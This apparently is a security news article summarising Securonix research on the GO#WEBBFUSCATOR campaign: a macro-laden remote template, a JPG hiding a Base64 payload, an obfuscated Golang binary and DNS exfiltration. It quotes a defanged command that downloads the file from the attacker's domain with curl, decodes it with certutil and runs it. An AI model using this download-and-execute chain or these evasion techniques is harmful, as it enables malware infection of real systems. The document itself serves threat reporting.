It also offers a much lower detection rate against security software and improved resistance to reverse engineering and analysis.
This includes an external reference hidden inside the documents metadata that downloads a malicious template file.
The malicious VBA macro code is set to be auto-executed once macros are enabled.
As with traditionally included macros, the template includes the functions Auto_Open, AutoOpen, and AutoExec.
Once the script runs, it downloads a JPG image OxB36F8GEEC634[.
]jpg from a remote resource (xmlschemeformat[.
]com), decodes it into an executable (msdllupdate.exe) using certutil.exe, and launches it.
cmd.exe /c cd c:\users\test\appdata\local & curl hxxp://www[.
]xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe
The image file is quite interesting.
It executes as a standard .jpg image as seen in the image below.
However, things get interesting when inspected with a text editor, reads theanalysispublished by the experts.
The image contains malicious Base64 code disguised as an included certificate.
At the time of publication, this particular file is undetected by all antivirus vendors according to VirusTotal.
The binary msdllupdate.exe employs several obfuscation techniques for evade execution AV and make analysis difficult.
The Golang assemblies were encoded using XOR with a 0x20 byte offset to hide them from analysts.
Additionally, the assemblies use case alteration to assist in bypassing AV signature detection by security tools.
Once executed, the malware makes unique DNS connections.
This technique works by sending an encrypted string appended to the DNS query set as a subdomain.
We have observed similar behavior with DNS exfiltration tools such asDNSCAT2, continues the report.
The encrypted messages are read in and unencrypted on the C2 server, thus revealing its original contents.
All information is encoded using Base64.
Securonix has shared Indicators of Compromise (IoCs) along with MITRE ATT&CK techniques.
Overall, TTPs observed with GO#WEBBFUSCATOR during the entire attack chain are quite interesting.
source: www.techworm.net
